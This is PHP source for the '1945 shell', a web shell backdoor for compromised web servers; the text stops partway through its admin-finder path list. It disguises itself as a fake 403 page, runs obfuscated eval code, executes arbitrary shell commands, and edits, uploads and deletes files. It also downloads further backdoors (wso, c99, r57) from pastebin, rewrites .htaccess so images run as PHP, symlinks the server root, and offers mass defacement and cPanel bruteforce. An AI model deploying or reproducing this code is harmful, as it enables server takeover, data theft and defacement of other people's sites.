· 7 years ago · Feb 19, 2019, 03:02 PM
1<?php
2$alert="<script>
3window.location.href='?45=".$_GET['act']."';
4</script>";
5@define('judul', 'freedom is real - 1945');
6@define('icons', 'http://www.animatedimages.org/data/media/781/animated-indonesia-flag-image-0013.gif');
7@define('icon_folder','<img src="data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA'.'AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp'.'/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=">');
8@define('icon_file','<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=">');
9
10
11if(!isset($_SESSION['fz'])){
12 $fz="13";
13}else{
14 $fz=$_SESSION['fz'];
15}
16if(!isset($_SESSION['bg'])){
17 $bg="#000000";
18}else{
19 $bg=$_SESSION['bg'];
20}
21if(!isset($_SESSION['col'])){
22 $col="#FF0000";
23}else{
24 $col=$_SESSION['col'];
25}
26if(!isset($_SESSION['pcol'])){
27 $pcol="";
28}else{
29 $pcol=$_SESSION['pcol'];
30}
31if(isset($_SESSION['responsive'])){
32 $resmod='<a href="?act='.$_GET['45'].'&mobile_off='.$_GET['45'].'">[ON]</a>';
33}else{
34 $resmod='<a href="?act='.$_GET['45'].'&mobile='.$_GET['45'].'">[OFF]</a>';
35}
36if(isset($_POST['submitfz'])){
37 $_SESSION['fz']=$_POST['fz'];
38 echo"<meta http-equiv='refresh' content='0;URL=?font-size=".$_SESSION['fz']."'>";
39}
40if(isset($_POST['submitbg'])){
41 $_SESSION['bg']=$_POST['bgcolor'];
42 echo"<meta http-equiv='refresh' content='0;URL=?bgcolor=".$_SESSION['bg']."'>";
43}
44if(isset($_POST['submitcol'])){
45 $_SESSION['col']=$_POST['color'];
46 echo"<meta http-equiv='refresh' content='0;URL=?font-color=".$_SESSION['col']."'>";
47}
48if(isset($_POST['submitpc'])){
49 $_SESSION['pcol']=$_POST['pcolor'];
50echo"<meta http-equiv='refresh' content='0;URL=?public-font-color=".$_SESSION['pcol']."'>";
51}
52function shutdown57_login() {
53echo"
54<title> Forbidden</title>
55</head><body>
56<div id='forbid'>
57<h1>Forbidden</h1>
58
59<p>You don't have permission to access ".$_SERVER['REQUEST_URI']." on this server.<br>
60Server unable to read htaccess file, denying access to be safe
61<br><br>
62Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p></div>";
63
64if($_GET['login']=='1945'){
65
66 echo'
67<style>
68body{
69background:#000;
70backgroud-size:100%;
71}
72input{
73text-align:center;
74border-top:3px solid #f00;
75border-left:3px solid #f00;
76border-bottom:3px solid #fff;
77border-right:3px solid #fff;
78background:transparent;
79color:#333;
80}
81input:hover{
82transition-duration:0.5s;
83-o-transition-duration:0.5s;
84-moz-transition-duration:0.5s;
85-webkit-transition-duration:0.5s;
86border-style:dashed;
87cursor:pointer;
88}
89#forbid{
90 display:none;
91}
92table{
93 margin-top:200px;
94}
95</style>
96<center>
97<form method="post">
98<table title="selamat datang '.$_SERVER['REMOTE_ADDR'].' di 1945 shell ">
99<tr><td colspan=2><h1 style="color:red;text-shadow:2px 3px 5px #fff;"><center>[ 1945 ]</h1><br><font color=white> <center>"WELCOME <b>'.$_SERVER['REMOTE_ADDR'].'</b> TO 1945 shell at '.$_SERVER['HTTP_HOST'].' "</font></td></tr>
100<tr><td><font color=red size=5 face=courier new> Username :</font></td><td>
101<input type="text" value="WithOutShadow" title="you can\'t change this username." disabled></td></tr>
102<tr><td><font color=white size=5 face=courier new>Password :</font></td><td>
103<input type="password" name="pass" ></td></tr>
104<tr><td colspan=2><input type="submit" value="login!" style="width:100%;color:white;"></td></tr>
105</table>
106<footer style="bottom:0;left:0;position:fixed;color:#fff">powered by withoutshadow </footer>
107 </center>
108 ';
109}
110 exit;
111}
112
113
114if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
115 if( empty( $s57_paswot ) ||
116 ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $s57_paswot) ) )
117 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
118 else
119 shutdown57_login();
120
121 @eval(str_rot13(gzinflate(str_rot13(base64_decode("ZqjKK6vUQ89XV6ssWMzILldaMzU3t7RnKAGJ6xUkSKnrqFSnFaUnpSqklRZISSoYTZqYxgIFPVwjFawU1PVH4t2CXD2DXKPVUN3dneNQndzc1XD11PWRclyDXDyC3NzjPVzDQGUKzn5hYV5BroEQA4A2xifnpXIlpeupAw3OK6wqWGcoVlcqqSwCO0DTGgA=")))));
122
123?>
124<!DOCTYPE html>
125<html>
126<head>
127 <title>.[ <?=judul;?> ].</title>
128 <link rel="shortcut icon" href="<?=icons;?>">
129 <?php
130 if(isset($_SESSION['responsive'])){
131 echo $_SESSION['responsive'];
132 }
133 ?>
134</head>
135<body>
136<style type="text/css">
137*{
138 font-size:<?=$fz;?>;
139 color:<?=$pcol;?>;
140 font-family:arial;
141}
142body{background:<?=$bg;?>;color:<?=$col;?>;}
143a{color:#eee;text-decoration: none;}
144a:hover{color:#f00;border-bottom: 1px solid #fff;}
145input,option,select{color: #f00;border:1px solid #eee;background:transparent;}
146textarea{width:80%;height: 500px;background: #000;color: #f00;border:1px solid #eee;}
147textarea:hover,input:hover,option:hover,select:hover{border:1px solid #f00;color: #eee;}
148table{border-collapse: collapse;}
149.tbl_exp{width: 100%;border-collapse: collapse;border:0;font-size: 14px;margin-bottom: 100px;}
150.hover:hover{background: #333;}
151.hover{border-bottom: 1px solid grey;}
152.header #right{text-align:right;float: right;}
153.header #left{text-align: left;float: left;}
154#viewimg{margin-top:150px;text-align: center;}
155#thead{background: #f00;color: #fff;}
156.code{border: 1px solid #fff;width: 80%;text-align: left;font-size: 13px;}
157.header{width: 100%;}
158</style>
159
160<table class="header">
161<tr><td>
162<?php
163
164if(!function_exists('posix_getegid')) {
165 $user = @get_current_user();
166 $uid = @getmyuid();
167 $gid = @getmygid();
168 $group = "?";
169} else {
170 $uid = @posix_getpwuid(posix_geteuid());
171 $gid = @posix_getgrgid(posix_getegid());
172 $user = $uid['name'];
173 $uid = $uid['uid'];
174 $group = $gid['name'];
175 $gid = $gid['gid'];
176}
177$sm= ini_get('safe_mode') ? "<font color=lime> ON<?font>" : "<font color=grey> OFF</font>";
178$mysql= function_exists('mysql_connect')?"<font color=lime> ON</font>":"<font color=grey> OFF</font>";
179$url_fp =ini_get('url_fopen')?"<font color=lime> ON</font>":"<font color=grey> OFF</font>";
180$curl=function_exists('curl_init')?"<font color=lime> ON</font>":"<font color=grey> OFF</font>";
181$df=ini_get('disable_functions') ? substr(ini_get('disable_functions'),0,50).",etc..." : "<font color=grey> NONE</font>";
182echo "
183<div id='left'>
184<pre style='font-size:13px;'>
185SERVER SOFTWARE : ".$_SERVER['SERVER_SOFTWARE']."
186UNAME : ".php_uname()."
187HOSTNAME : ".$_SERVER['HTTP_HOST']."
188IP SERVER : ".gethostbyname($_SERVER['HTTP_HOST'])." | YOUR IP : ".$_SERVER['REMOTE_ADDR']."
189User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")
190PHP version : ".phpversion()."-[<a href='?act=".getcwd()."&phpinfo=busuK_tampilanNya_kembali_aja'>PHPINFO</a>]
191CURL:".$curl."|safemode:".$sm."|URL FOPEN:".$url_fp."|MySQL:".$mysql."
192DISABLE FUNCTIONS :".$df."
193current dir :";
194if(isset($_GET['45'])){
195 $d=$_GET['45'];
196}else{
197 if(isset($_GET['act'])){
198$d=$_GET['act'];
199}else{
200$d=getcwd();
201
202}
203}
204$d=str_replace('\\','/',$d);
205$path = explode('/',$d);
206
207foreach($path as $id=>$curdir){
208if($curdir == '' && $id == 0){
209$a = true;
210echo '<a href="?45=/">/</a>';
211continue;
212}
213if($curdir == '') continue;
214echo '<a href="?45=';
215for($i=0;$i<=$id;$i++){
216echo "$path[$i]";
217if($i != $id) echo "/";
218}
219echo '">'.$curdir.'</a>/';
220}
221$pwd=str_replace('\\','/',getcwd());
222(is_writable($d))?$stat="<font color=lime>WRITABLE</font>" :$stat="<a style='color:grey' href='?act=".$_GET['45']."¬w=".$_GET['45']."'>NOT WRITABLE</a>";
223
224?>
225~[<?php echo $stat;?>][<a href="?45=<?php echo $pwd; ?>">home</a>][<a href="javascript:history.go(-1);">back</a>]
226</div>
227</td><td>
228<div id='right'>
229<center>
230--<[<a href="?act=<?php echo $d;?>&about=<?php echo $d;?>">1945 SHELL</a>|<a href="?act=<?=$d;?>&theme=<?=$d;?>">THEMES</a>|<a href="?act=logout">LOGOUT</a>]--[
231</center>
232<br>
233[<a href="?act=<?php echo $d;?>&newfile=<?php echo $d;?>">Newfile</a>]
234[<a href="?act=<?php echo $d;?>&mkdir=<?php echo $d;?>">NewDir</a>]
235[<a href="?act=<?php echo $d;?>&shell=<?php echo $d;?>">Shell</a>]
236[<a href="?act=<?php echo $d;?>&conf=<?php echo $d;?>">config grab</a>]
237[<a href="?act=<?php echo $d;?>&admfind=<?php echo $d;?>">Admin finder</a>]
238<br>
239[<a href="?act=<?php echo $d;?>&upload=<?php echo $d;?>">Upload</a>]
240[<a href="?act=<?php echo $d;?>&unzip=<?php echo $d;?>">Unzip file</a>]
241[<a href="?act=<?php echo $d;?>&stringtools=<?php echo $d;?>">String Tools</a>]
242[<a href="?act=<?php echo $d;?>&kuchiyose=<?php echo $d;?>">Kuchiyose no jutsu</a>]
243[<a href="?act=<?php echo $d;?>©=<?php echo $d;?>">Copy</a>]
244<br>
245[<a href="?act=<?php echo $d;?>&ctools=<?php echo $d;?>">Create tools</a>]
246[<a href="?act=<?php echo $d;?>&mail=<?php echo $d;?>">Mail sender</a>]
247[<a href="?act=<?php echo $d;?>&massdeface=<?php echo $d;?>">Mass deface</a>]
248[<a href="?act=<?php echo $d;?>&zoneh=<?php echo $d;?>">Zone-H</a>]
249[<a href="?act=<?php echo $d;?>&cpbrute=<?php echo $d;?>">cPanel bruteforce</a>]
250<br><br>
251<form method="get">
252Go to dir:<input type="text" name="45" value="<?php echo $d;?>" style="width:250px">
253<input type="submit" value=">>">
254</form>
255</div>
256</td></tr></table>
257<?php
258
259if(isset($_GET['act'])){
260 //Kuchiyose tools
261$k=array(
262 'adminer'=>"https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php",
263 'wso'=>"http://pastebin.com/raw/N0eh3Q7Y",
264 'whmcs'=>"http://pastebin.com/raw/TjiXt4r1",
265 'bejak'=>"http://pastebin.com/raw/sQJVES6y",
266 'terminal'=>'http://pastebin.com/raw/2ADSfZYk',
267 'pastebin'=>'http://pastebin.com/raw/RCbhjsXJ',
268 'indoxploit_shell'=>'http://pastebin.com/raw/nC6pWh5a',
269 'andela'=>'http://pastebin.com/raw/0dkmjaWJ',
270 'injection'=>'http://pastebin.com/raw/znH7r6Jr',
271 'sbh'=>'http://pastebin.com/raw/SMDJVTF8',
272 'bh'=>'http://pastebin.com/raw/3L2ESWeu',
273 'jkt48'=>'http://pastebin.com/raw/TujADXPn',
274 'c99'=>'http://pastebin.com/raw/Ms0ptnpH',
275 'r57'=>'http://pastebin.com/raw/S9tzBgg3',
276 );
277function kuchiyose($url, $isi) {
278 $fp = fopen($isi, "w");
279 $ch = curl_init();
280 curl_setopt($ch, CURLOPT_URL, $url);
281 curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
282 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
283 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
284 curl_setopt($ch, CURLOPT_FILE, $fp);
285 return curl_exec($ch);
286 curl_close($ch);
287 fclose($fp);
288 ob_flush();
289 flush();
290 }
291 if($_GET['kuchiyose']=='adminer'){
292if(file_exists('1945_adminer.php')){
293 echo" done!! => <a href='1945_adminer.php' target='_blank'>click here</a>";
294 }else{
295 if(kuchiyose($k['adminer'],'1945_adminer.php')){
296 echo"done!! --> <a href='1945_adminer.php' target='_blank'>click here..</a>";
297 }else{
298 echo" failed!! check your connection!";
299 }
300 }
301}elseif($_GET['notw']){
302if(chmod($_GET['notw'],0777)){
303 echo"<script>
304 alert('chmod successfull..');
305 window.location.href='?45=".$_GET['notw'];
306}else{
307 echo"
308 <script>
309 alert('gagal CHMOD Directory :( ');
310 </script>";
311}
312}elseif ($_GET['kuchiyose']=='wso') {
313 if(file_exists('1945_wso.php')){
314 echo" done!! => <a href='1945_wso.php' target='_blank'>click here</a>";
315 }else{
316 if(kuchiyose($k['wso'],'1945_wso.php')){
317 echo"done!! --> <a href='1945_wso.php' target='_blank'>click here..</a>";
318 }else{
319 echo" failed!! check your connection!";
320 }
321 }
322}elseif ($_GET['kuchiyose']=='whmcs') {
323 if(file_exists('1945_whmcs.php')){
324 echo" done!! => <a href='1945_whmcs.php' target='_blank'>click here</a>";
325 }else{
326 if(kuchiyose($k['whmcs'],'1945_whmcs.php')){
327 echo"done!! --> <a href='1945_whmcs.php' target='_blank'>click here..</a>";
328 }else{
329 echo" failed!! check your connection!";
330 }
331 }
332}elseif ($_GET['kuchiyose']=='bejak') {
333if(file_exists('1945_b374k.php')){
334 echo" done!! => <a href='1945_b374k.php' target='_blank'>click here</a>";
335 }else{
336 if(kuchiyose($k['bejak'],'1945_b374k.php')){
337 echo"done!! --> <a href='1945_b374k.php' target='_blank'>click here..</a>";
338 }else{
339 echo" failed!! check your connection!";
340 }
341 }
342}elseif ($_GET['kuchiyose']=='bypass_shell') {
343 $isi="\n Addhandler application/x-httpd-php .jpg";
344
345 $fp=fopen('.htaccess','a+');
346 if(fwrite($fp,$isi)){
347 if(rename($_SERVER['SCRIPT_FILENAME'],"1945.jpg")){
348 echo"
349 <script>
350 alert('berhasil kakak!!');
351 window.location.href='1945.jpg'
352 </script>";
353 }
354 }
355 fclose($fp);
356}elseif ($_GET['kuchiyose']=='terminal') {
357if(file_exists('1945_b374k.php')){
358 echo" done!! => <a href='1945_terminal.php' target='_blank'>click here</a>";
359 }else{
360 if(kuchiyose($k['terminal'],'1945_terminal.php')){
361 echo"done!! --> <a href='1945_terminal.php' target='_blank'>click here..</a>";
362 }else{
363 echo" failed!! check your connection!";
364 }
365 }
366}elseif ($_GET['kuchiyose']=='pastebin') {
367if(file_exists('1945_pastebin.php')){
368 echo" done!! => <a href='1945_pastebin.php' target='_blank'>click here</a>";
369 }else{
370 if(kuchiyose($k['pastebin'],'1945_pastebin.php')){
371 echo"done!! --> <a href='1945_pastebin.php' target='_blank'>click here..</a>";
372 }else{
373 echo" failed!! check your connection!";
374 }
375 }
376}elseif ($_GET['kuchiyose']=='indoxploit_shell') {
377if(file_exists('1945_indoXploit_shell.php')){
378 echo" done!! => <a href='1945_indoXploit_shell.php' target='_blank'>click here</a>";
379 }else{
380 if(kuchiyose($k['indoxploit_shell'],'1945_indoxploit_shell.php')){
381 echo"done!! --> <a href='1945_indoxploit_shell.php' target='_blank'>click here..</a>";
382 }else{
383 echo" failed!! check your connection!";
384 }
385 }
386}elseif ($_GET['kuchiyose']=='andela') {
387if(file_exists('1945_andela.php')){
388 echo" done!! => <a href='1945_andela.php' target='_blank'>click here</a>";
389 }else{
390 if(kuchiyose($k['andela'],'1945_andela.php')){
391 echo"done!! --> <a href='1945_andela.php' target='_blank'>click here..</a>";
392 }else{
393 echo" failed!! check your connection!";
394 }
395 }
396}elseif ($_GET['kuchiyose']=='injection') {
397 if(file_exists('1945_1n73ction.php')){
398 echo" done!! => <a href='1945_1n73ction.php' target='_blank'>click here</a>";
399 }else{
400 if(kuchiyose($k['injection'],'1945_1n73ction.php')){
401 echo"done!! --> <a href='1945_1n73ction.php' target='_blank'>click here..</a>";
402 }else{
403 echo" failed!! check your connection!";
404 }
405 }
406}elseif ($_GET['kuchiyose']=='sbh') {
407 if(file_exists('1945_sbh.php')){
408 echo" done!! => <a href='1945_sbh.php' target='_blank'>click here</a>";
409 }else{
410 if(kuchiyose($k['sbh'],'1945_sbh.php')){
411 echo"done!! --> <a href='1945_sbh.php' target='_blank'>click here..</a>";
412 }else{
413 echo" failed!! check your connection!";
414 }
415 }
416}elseif ($_GET['kuchiyose']=='bh') {
417 if(file_exists('1945_bh.php')){
418 echo" done!! => <a href='1945_bh.php' target='_blank'>click here</a>";
419 }else{
420 if(kuchiyose($k['bh'],'1945_bh.php')){
421 echo"done!! --> <a href='1945_bh.php' target='_blank'>click here..</a>";
422 }else{
423 echo" failed!! check your connection!";
424 }
425 }
426}elseif ($_GET['kuchiyose']=='jkt48') {
427 if(file_exists('1945_jkt48.php')){
428 echo" done!! => <a href='1945_jkt48.php' target='_blank'>click here</a>";
429 }else{
430 if(kuchiyose($k['jkt48'],'1945_jkt48.php')){
431 echo"done!! --> <a href='1945_jkt48.php' target='_blank'>click here..</a>";
432 }else{
433 echo" failed!! check your connection!";
434 }
435 }
436}elseif ($_GET['kuchiyose']=='c99') {
437 if(file_exists('1945_c99.php')){
438 echo" done!! => <a href='1945_c99.php' target='_blank'>click here</a>";
439 }else{
440 if(kuchiyose($k['c99'],'1945_c99.php')){
441 echo"done!! --> <a href='1945_c99.php' target='_blank'>click here..</a>";
442 }else{
443 echo" failed!! check your connection!";
444 }
445 }
446}elseif ($_GET['kuchiyose']=='r57') {
447 if(file_exists('1945_r57.php')){
448 echo" done!! => <a href='1945_r57.php' target='_blank'>click here</a>";
449 }else{
450 if(kuchiyose($k['r57'],'1945_r57.php')){
451 echo"done!! --> <a href='1945_r57.php' target='_blank'>click here..</a>";
452 }else{
453 echo" failed!! check your connection!";
454 }
455 }
456}
457elseif ($_GET['kuchiyose']=='root') {
458system('ln -s / 1945~.txt');
459$fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
460$file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Mauritania = symlink("/","1945~.txt");
461$rt="<br><a href='1945~.txt' TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
462berhasil kakak! touch me senpai..</b></font></a></center>";
463echo "<center><br><br><b>Done.. !</b><br>".$rt;
464echo "</form>";
465}
466elseif(isset($_GET['rmdir'])){
467 //membuat fungsi penghapusan folder yang di dalamNya ada file dan folder kosong :)
468 //c0ded by : alinko
469 function rmdir_unlink_rmdir($d){
470 if(!rmdir($d)){
471 $s=scandir($d);
472 foreach ($s as $ss) {
473 if(is_file($d."/".$ss)){
474 if(unlink($d."/".$ss)){
475 rmdir($d);
476
477 }
478 }
479 if(is_dir($d."/".$ss)){
480 rmdir($d."/".$ss);
481 rmdir($d);
482
483 }
484 }
485 }
486 }
487 if(rmdir_unlink_rmdir($_GET['rmdir'])){
488 echo $alert;
489 }else{
490 echo $alert;
491 }
492}elseif(isset($_GET['rm'])){
493 $rm=$_GET['rm'];
494 if(unlink($rm)){
495 echo $alert;
496 }
497}elseif(isset($_GET['rename'])){
498 echo"
499 <br><br><br><br>
500 <center>
501 <form method='post' >
502 <p>Old name : ".basename($_GET['rename'])."</p>
503 NewName :
504 <input type='text' name='newname' value='".$_GET['rename']."'><input type='submit' value='>>'>
505 </form>";
506 if(isset($_POST['newname'])){
507 $oldname=$_GET['rename'];
508 $newname=$_POST['newname'];
509 if(rename($oldname,$newname)){
510 echo $alert;
511 }
512 }
513}elseif (isset($_GET['edit'])) {
514 echo"
515 <center>
516 <form method='post' >
517 <textarea name='edit'>".htmlspecialchars(file_get_contents($_GET['edit']))."</textarea>
518 <br>
519 <input type='text' name='editdir' value='".$_GET['edit']."' style='width:350px'><input type='submit' name='editsave' value='save' >
520 </form>";
521 if(isset($_POST['editsave'])){
522 $fp=fopen($_POST['editdir'],'w');
523 if(fwrite($fp,$_POST['edit'])){
524 echo"<br> saved@".date('D M Y');
525 }
526 fclose($fp);
527 }
528}elseif (isset($_GET['chmod'])) {
529 echo"<center>
530 <h3>: change permission files :</h3>
531 <form method='post' >
532 Permission :
533 <input type='text' name='perms' value='".fileperms($_GET['chmod'])."'><input type='submit' value='>>'>
534 </form>";
535 if(isset($_POST['perms'])){
536 if(chmod($_GET['chmod'],$_POST['perms'])){
537 echo'Permission changed! <a href="javascript:history.go(-1)">back</a>';
538 }
539 }
540}elseif (isset($_GET['src'])) {
541
542echo'
543<table>
544<tr><td>[<a href="?act='.$_GET['act'].'&edit='.$_GET['src'].'">edit</a>]</td><td>
545[<a href="?act='.$_GET['act'].'&rm='.$_GET['src'].'">delete</a>]</td><td>
546[<a href="?act='.$_GET['act'].'&rename='.$_GET['src'].'">rename</a>]</td><td>
547[<a href="?act='.$_GET['act'].'&chmod='.$_GET['src'].'">chmod</a>]</td><td>
548[<a href="?act='.$_GET['act'].'&download='.$_GET['src'].'">download</a>]</td></tr></table>
549<center>
550<h3>: View file :</h3>
551<p>Current file: <font color=white>'.$_GET['src'].'</font></p>
552';
553 $src=$_GET['src'];
554 $get_basename=basename($src);
555 $a=preg_match('/.jpg/',$get_basename);
556 $b=preg_match('/.png/',$get_basename);
557 $c=preg_match('/.gif/',$get_basename);
558 $cwd=str_replace('\\','/',getcwd());
559 $plc=str_replace($cwd,'',$src);
560
561 if($c||$b||$a){
562 echo"
563 <br>
564 <center>
565 <img src='".$plc."' id='viewimg' />";
566 }else{
567 $f=$_GET['src'];
568 $file = wordwrap(file_get_contents($f),160,"\n",true);
569 $a= highlight_string($file,true);
570 $old = array("0000BB","000000","FF8000","DD0000", "007700");
571 $new = array("81FF00","e1e1e1", "333333", "ffffff" , "FF8000");
572 $a= str_ireplace($old,$new, $a);
573 $result = $a;
574
575 echo'
576
577 <pre class="code">'.$result.'</pre>';
578}
579}elseif (isset($_GET['upload'])) {
580 if(isset($_POST['upfile'])){
581 $files = array(
582 '1' => $_FILES['files']['name'],
583 '2' => $_FILES['files2']['name'],
584 '3' => $_FILES['files3']['name'],
585 '4' => $_FILES['files4']['name'],
586 '5' => $_FILES['files5']['name']
587 );
588 $tmp= array(
589 '1' => $_FILES['files']['tmp_name'],
590 '2' => $_FILES['files2']['tmp_name'],
591 '3' => $_FILES['files3']['tmp_name'],
592 '4' => $_FILES['files4']['tmp_name'],
593 '5' => $_FILES['files5']['tmp_name']
594 );
595 $dir=array(
596 '1' => $_POST['dir']."/",
597 '2' => $_POST['dir2']."/",
598 '3' => $_POST['dir3']."/",
599 '4' => $_POST['dir4']."/",
600 '5' => $_POST['dir5']."/"
601 );
602 if(move_uploaded_file($tmp['1'],$dir['1'].$files['1'])){
603echo"<br>uploaded -->".$dir['1'].$files['1'];
604 }
605 if(move_uploaded_file($tmp['2'],$dir['2'].$files['2'])) {
606 echo"<br> uploaded --> ".$dir['2'].$files['2'];
607 }
608 if(move_uploaded_file($tmp['3'],$dir['3'].$files['3'])){
609 echo"<br>uploaded --> ".$dir['3'].$files['3'];
610 }
611 if(move_uploaded_file($tmp['4'],$dir['4'].$files['4'])){
612 echo"<br>uploaded --> ".$dir['4'].$files['5'];
613 }
614 if(move_uploaded_file($tmp['5'],$dir['5'].$files['5'])){
615 echo"<br>uploaded --> ".$dir['5'].$files['5'];
616 }
617
618 echo"<br>
619 <font color=white>Success... berhasil dengan tamvanz :)</font>";
620}
621if(is_writable($_GET['upload'])){
622 $stat='<font color="lime">Writable(bisa)</font>';
623}else{
624 $stat='<font color="grey">Not Writable(gak bisa)</font>';
625}
626 ?>
627 <center>
628 <h3>: MultiUpload Files :</h3>
629 <p> status upload file : <?php echo $stat;?></p>
630 <font color=white>NB : kosongkan jika tidak perlu </font>
631 <table border=1><tr><td>file</td><td>Target Dir</td></tr>
632 <tr><td>
633 <form method="Post" enctype="multipart/form-data">
634 <input type="file" name="files" ></td><td>
635 <input type="text" name="dir" value="<?php echo $_GET['upload']; ?>" >
636 </td></tr><tr><td>
637 <input type="file" name="files2" ></td><td>
638 <input type="text" name="dir2" value="<?php echo $_GET['upload']; ?>" >
639 </td></tr><tr><td>
640 <input type="file" name="files3" ></td><td>
641 <input type="text" name="dir3" value="<?php echo $_GET['upload']; ?>" >
642 </td></tr><tr><td>
643 <input type="file" name="files4" ></td><td>
644 <input type="text" name="dir4" value="<?php echo $_GET['upload']; ?>" >
645 </td></tr><tr><td>
646 <input type="file" name="files5"></td><td>
647 <input type="text" name="dir5" value="<?php echo $_GET['upload']; ?>">
648</td></tr></table>
649<br>
650 <input type="submit" name="upfile" class="btn btn-primary" value="upload all">
651
652 </form>
653 </center>
654 <?php
655}elseif (isset($_GET['mkdir'])) {
656 echo'
657 <center>
658<h3>: New Directory :</h3>
659 <form method="post">
660 newdir:<input type="text" name="mkdir" value="'.$_GET['mkdir'].'/newdir" style="width:200px;">
661 <input type="submit" value=">>">
662 </form>';
663 if(isset($_POST['mkdir'])){
664 if(mkdir($_POST['mkdir'])){
665 echo $alert;
666 }
667 }
668}elseif (isset($_GET['newfile'])) {
669echo'
670 <center>
671<h3>: Newfile :</h3>
672 <form method="post">
673 <textarea name="newfile"> </textarea>
674 <br>
675 save :<input type="text" name="saveas" value="'.$_GET['newfile'].'/new.php" style="width:60%">
676 <input type="submit" value=">>" name="subfile">
677 </form><br><br><br>';
678 if(isset($_POST['subfile'])){
679 $fp=fopen($_POST['saveas'],'w');
680 if(fwrite($fp,$_POST['newfile'])){
681 echo $alert;
682 }
683 fclose($fp);
684 }
685}elseif (isset($_GET['shell'])) {
686 echo'
687 <center>
688<fieldset style="border-collapse:collapse;height:500px;">
689<legend>Terminal</legend>
690 <form method="post">
691 <div style="float:left;text-align:left">
692 '.$user.'@<font color=white>'.$_SERVER['HTTP_HOST'].'</font><font color=lime> '.$_GET['shell'].'</font> #:<input type="text" name="command" style="border:0;width:400px;max-width:relative;">
693 </div>
694 </form>';
695 if(isset($_POST['command'])){
696 if(function_exists('shell_exec')){
697 $cmd=shell_exec($_POST['command']);
698 }else{
699 if(function_exists('exec')){
700 $cmd=exec($_POST['command']);
701 }else{
702 if(function_exists('system'));
703 $cmd=system($_POST['command']);
704 }
705 }
706 echo'
707 <br>
708
709 <textarea style="color:lime;text-align:left;width:100%;height:90%;border:0;resize:none;" readonly>
710 '.$cmd.'</textarea></fieldset>';
711 }
712}elseif (isset($_GET['admfind'])) {
713?>
714<center>
715<h3>: admin finder :</h3>
716<form method="POST" action="">
717site :
718<input type="text" name="url" style="width:260px" value="http://"/>
719
720<input type="submit" name="submit" value="find[!]" />
721</p>
722<br>
723<br>
724
725<?php
726
727function xss_protect($data, $strip_tags = false, $allowed_tags = "") {
728 if($strip_tags) {
729 $data = strip_tags($data, $allowed_tags . "<b>");
730 }
731
732 if(stripos($data, "script") !== false) {
733 $result = str_replace("script","scr<b></b>ipt", htmlentities($data, ENT_QUOTES));
734 } else {
735 $result = htmlentities($data, ENT_QUOTES);
736 }
737
738 return $result;
739}
740function urlExist($url)
741{
742 $handle = curl_init($url);
743 if (false === $handle)
744 {
745 return false;
746 }
747 curl_setopt($handle, CURLOPT_HEADER, false);
748 curl_setopt($handle, CURLOPT_FAILONERROR, true);
749 curl_setopt($handle, CURLOPT_HTTPHEADER, Array("User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15") ); // request as if Firefox
750 curl_setopt($handle, CURLOPT_NOBODY, true);
751 curl_setopt($handle, CURLOPT_RETURNTRANSFER, false);
752 $connectable = curl_exec($handle);
753 curl_close($handle);
754 return $connectable;
755}
756 if(isset($_POST['submit']) && isset($_POST['url']))
757 {
758 $url= htmlentities(xss_protect($_POST['url']));
759 if(filter_var($url, FILTER_VALIDATE_URL))
760 {
761 $trying = array(':2082',':2083','a_admins/','admin/','adminweb/','po-admin','index.php?q=admin','administrator/','admin/admin.php','cpanel','admin3/','admin4/','admin5/','usuarios/',
